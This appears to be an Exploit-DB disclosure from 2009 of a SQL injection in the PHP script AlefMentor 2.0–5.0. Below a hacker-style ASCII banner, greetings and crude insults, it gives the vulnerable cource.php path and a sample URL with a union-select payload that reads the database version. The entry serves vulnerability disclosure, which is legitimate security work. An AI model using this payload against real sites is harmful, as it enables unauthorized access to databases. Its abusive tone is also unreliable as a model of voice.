AlefMentor 2.0 < 5.0 - 'id' SQL Injection

EDB-ID:

10358


Platform:

PHP

Published:

2009-12-08

      _ _ _ _  _ _ _   _ _ _ _    _ _ _    __  _ _ _ _               _____1337~h4x0rZ__   _        ___    ___
    /_/Rd_ _ /   _ _\\/   _ _ /   \\      \\<   |/_ _   /         /\\   |     \\    /\\  ||   \\( )   /\\  |  \\  (| |
    \\_ _ _ _/  /_ _ /  /      __ |  ()  / |  |  /   / [d0t]com/@~\\  | (O) /   /+~\\ ||_O_|( )  /0O\\ |   \\  | |
     _ _ _ _\\  \\_ _ \\  \\ _ _ _   |     \\  |  | /   /_ _      /|__|\\ |     \\  /|__|\\|| O |( ) /+__+\\| ^  \\ | |
   /_ _ _ _ _\\ _ _ _/\\ _ _ _ /   |__|\\__\\ |__|/_ _ _ _ _\\   /\\|  |/\\|__|\\__\\( )  ( )|___/(_)/\\|  |/\\__\\__\\|_ >
       
	   
==============================================================================
        [ª] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [ª]  AlefMentor 2.0  <== 5.0 (id) Remote SQL Injection Vulnerability
==============================================================================
    [ª] my home:              [ http://sec-r1z.com ]
    [ª] Script:                    [ AlefMentor 2.0 ]
    [ª] Language:             [ PHP ]
    [ª] Download             [ http://alefmentor.mac.findmysoft.com/ ]
    [ª] Founder:               [ ./Red-D3v1L ]
    [ª] Gr44tz to:             [ sec-r1z# Crew - Hackteach Team - my love :$ ]
    [ª] Fuck to :               [ All LamErZ And n00bz ]
########################################################################

===[ Exploit SQL ]===  

 [ª] [Path]/cource.php?action=pregled&cont_id=[SQL]

 [ª] Live dem0 : 

http://www.site.com/am/cource.php?action=pregled&cont_id=21&courc_id=-2+union+select+version%28%29--


Author: Red-D3v1L <-

###########################################################################